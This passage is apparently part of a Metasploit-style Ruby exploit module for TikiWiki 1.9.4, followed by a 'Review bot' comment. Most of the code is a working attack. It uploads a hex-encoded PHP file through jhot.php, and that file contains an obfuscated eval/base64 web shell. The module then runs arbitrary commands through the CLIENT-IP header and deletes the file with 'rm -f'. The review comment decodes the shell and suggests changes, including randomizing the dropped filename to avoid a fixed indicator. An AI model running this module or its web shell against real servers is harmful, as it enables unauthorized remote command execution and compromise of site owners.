'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Sep 2 2006',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki/"]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['URI'] + "/tiki-index.php",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/TikiWiki 1.9.4/))
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
create_temp_file()
|
||||
|
||||
command = payload.encoded
|
||||
|
||||
exe_command(command)
|
||||
|
||||
remove_temp_file()
|
||||
end
|
||||
|
||||
def create_temp_file
|
||||
url_jhot = datastore['URI'] + "/jhot.php"
|
||||
|
||||
scode =
|
||||
"\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" +
|
||||
"\x64\x65\x72\x3a\x20\x2f\x63\x76\x73\x72\x6f\x6f\x74\x2f\x74\x69" +
|
||||
"\x6b\x69\x77\x69\x6b\x69\x2f\x74\x69\x6b\x69\x2f\x74\x69\x6b\x69" +
|
||||
"\x2d\x63\x6f\x6e\x66\x69\x67\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e" +
|
||||
"\x38\x2e\x32\x2e\x35\x20\x32\x30\x30\x35\x2f\x30\x38\x2f\x32\x32" +
|
||||
"\x20\x30\x38\x3a\x30\x30\x3a\x35\x33\x20\x74\x65\x6c\x65\x6e\x69" +
|
||||
"\x65\x6b\x6f\x20\x45\x78\x70\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20" +
|
||||
"\x43\x6f\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29\x20\x32\x30" +
|
||||
"\x30\x32\x2d\x32\x30\x30\x35\x2c\x20\x4c\x75\x69\x73\x20\x41\x72" +
|
||||
"\x67\x65\x72\x69\x63\x68\x2c\x20\x47\x61\x72\x6c\x61\x6e\x64\x20" +
|
||||
"\x46\x6f\x73\x74\x65\x72\x2c\x20\x45\x64\x75\x61\x72\x64\x6f\x20" +
|
||||
"\x50\x6f\x6c\x69\x64\x6f\x72\x2c\x20\x65\x74\x2e\x20\x61\x6c\x2e" +
|
||||
"\x0d\x0a\x2f\x2f\x20\x41\x6c\x6c\x20\x52\x69\x67\x68\x74\x73\x20" +
|
||||
"\x52\x65\x73\x65\x72\x76\x65\x64\x2e\x20\x53\x65\x65\x20\x63\x6f" +
|
||||
"\x70\x79\x72\x69\x67\x68\x74\x2e\x74\x78\x74\x20\x66\x6f\x72\x20" +
|
||||
"\x64\x65\x74\x61\x69\x6c\x73\x20\x61\x6e\x64\x20\x61\x20\x63\x6f" +
|
||||
"\x6d\x70\x6c\x65\x74\x65\x20\x6c\x69\x73\x74\x20\x6f\x66\x20\x61" +
|
||||
"\x75\x74\x68\x6f\x72\x73\x2e\x0d\x0a\x2f\x2f\x20\x4c\x69\x63\x65" +
|
||||
"\x6e\x73\x65\x64\x20\x75\x6e\x64\x65\x72\x20\x74\x68\x65\x20\x47" +
|
||||
"\x4e\x55\x20\x4c\x45\x53\x53\x45\x52\x20\x47\x45\x4e\x45\x52\x41" +
|
||||
"\x4c\x20\x50\x55\x42\x4c\x49\x43\x20\x4c\x49\x43\x45\x4e\x53\x45" +
|
||||
"\x2e\x20\x53\x65\x65\x20\x6c\x69\x63\x65\x6e\x73\x65\x2e\x74\x78" +
|
||||
"\x74\x20\x66\x6f\x72\x20\x64\x65\x74\x61\x69\x6c\x73\x2e\x0d\x0a" +
|
||||
"\x0d\x0a\x23\x20\x24\x48\x65\x61\x64\x65\x72\x3a\x20\x2f\x63\x76" +
|
||||
"\x73\x72\x6f\x6f\x74\x2f\x74\x69\x6b\x69\x77\x69\x6b\x69\x2f\x74" +
|
||||
"\x69\x6b\x69\x2f\x62\x61\x6e\x6e\x65\x72\x5f\x69\x6d\x61\x67\x65" +
|
||||
"\x2e\x70\x68\x70\x2c\x76\x20\x31\x2e\x38\x2e\x32\x2e\x35\x20\x32" +
|
||||
"\x30\x30\x35\x2f\x30\x38\x2f\x32\x32\x20\x30\x38\x3a\x30\x30\x3a" +
|
||||
"\x35\x33\x20\x74\x65\x6c\x65\x6e\x69\x65\x6b\x6f\x20\x45\x78\x70" +
|
||||
"\x20\x24\x0d\x0a\x0d\x0a\x2f\x2f\x20\x74\x69\x6b\x69\x77\x69\x6b" +
|
||||
"\x69\x20\x63\x6f\x6e\x66\x69\x67\x75\x72\x61\x74\x69\x6f\x6e\x20" +
|
||||
"\x73\x63\x72\x69\x70\x74\x0d\x0a\x0d\x0a\x65\x76\x61\x6c\x28\x62" +
|
||||
"\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22\x5a\x58" +
|
||||
"\x4a\x79\x62\x33\x4a\x66\x63\x6d\x56\x77\x62\x33\x4a\x30\x61\x57" +
|
||||
"\x35\x6e\x4b\x44\x41\x70\x4f\x33\x4e\x6c\x64\x46\x39\x30\x61\x57" +
|
||||
"\x31\x6c\x58\x32\x78\x70\x62\x57\x6c\x30\x4b\x44\x41\x70\x4f\x32" +
|
||||
"\x56\x6a\x61\x47\x38\x67\x49\x6d\x31\x35\x58\x32\x52\x6c\x62\x47" +
|
||||
"\x6c\x74\x49\x6a\x74\x77\x59\x58\x4e\x7a\x64\x47\x68\x79\x64\x53" +
|
||||
"\x67\x6b\x58\x31\x4e\x46\x55\x6c\x5a\x46\x55\x6c\x73\x69\x53\x46" +
|
||||
"\x52\x55\x55\x46\x39\x44\x54\x45\x6c\x46\x54\x6c\x52\x66\x53\x56" +
|
||||
"\x41\x69\x58\x53\x6b\x37\x22\x29\x29\x3b\x0d\x0a\x3f\x3e\x0d\x0a"
|
||||
|
||||
data =
|
||||
"-----------------------------7d529a1d23092a\r\n" +
|
||||
"Content-Disposition: form-data; name=\"filepath\"; filename=\"tiki-config.php\";\r\n\r\n" +
|
||||
scode +
|
||||
"\r\n" +
|
||||
"-----------------------------7d529a1d23092a--\r\n"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => url_jhot,
|
||||
'method' => 'POST',
|
||||
'data' => "#{data}",
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'Content-Type' => 'multipart/form-data; boundary=---------------------------7d529a1d23092a',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK")
|
||||
print_status("Successfully created temporary file.")
|
||||
else
|
||||
print_status("Error creating temporary file.")
|
||||
end
|
||||
end
|
||||
|
||||
def exe_command(cmd)
|
||||
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_config,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'CLIENT-IP' => "#{cmd};",
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK" and res.body.match(/my_delim/m))
|
||||
print_status("The server returned : #{res.code} #{res.message} (#{res.headers['Server']})")
|
||||
|
||||
cmd_output = res.body.match(/my_delim(.*)/m)
|
||||
|
||||
if (cmd_output)
|
||||
print_status("Command output from the server :")
|
||||
print("\n" + cmd_output[1] + "\n")
|
||||
else
|
||||
print_status("This server may not be vulnerable")
|
||||
end
|
||||
else
|
||||
print_status("No response from the server")
|
||||
end
|
||||
end
|
||||
|
||||
def remove_temp_file
|
||||
url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => url_config,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
|
||||
'CLIENT-IP' => 'rm -f tiki-config.php',
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
}, 25)
|
||||
|
||||
if (res and res.message == "OK")
|
||||
print_status("Successfully remove temporary file.")
|
||||
else
|
||||
print_status("Error removing temporary file.")
|
||||
end
|
||||
end
|
||||
end
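Review bot: The file dropped by create_temp_file is an unauthenticated web shell at a fixed, guessable path (the base64 inside scode decodes to `passthru($_SERVER["HTTP_CLIENT_IP"])`), and remove_temp_file reports "Successfully remove temporary file." on any 200 without confirming removal, so if `rm -f tiki-config.php` runs in a working directory other than img/wiki (PHP's cwd is not guaranteed to be the script's directory) the backdoor stays on the target for anyone to use; after the removal request, fetch url_config again and only claim success on a 404, otherwise warn with the path so the operator can clean it up, as sketched below. Randomizing the dropped name with `rand_text_alpha(8) + '.php'` and threading it through the three methods would remove the fixed indicator, and check should test `res.code == 200` rather than the reason phrase `res.message == "OK"`, which some servers rewrite.
```ruby
def remove_temp_file
  url_config = datastore['URI'] + "/img/wiki/tiki-config.php"
  # … unchanged: send_request_raw with 'CLIENT-IP' => 'rm -f tiki-config.php' …

  # Do not trust the 200: the dropped file is an unauthenticated shell, so verify it is gone.
  res = send_request_raw({ 'uri' => url_config, 'method' => 'GET' }, 25)
  if (res and res.code == 404)
    print_status("Successfully removed temporary file.")
  else
    print_error("Could not confirm removal of #{url_config} - remove it manually.")
  end
end
```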
|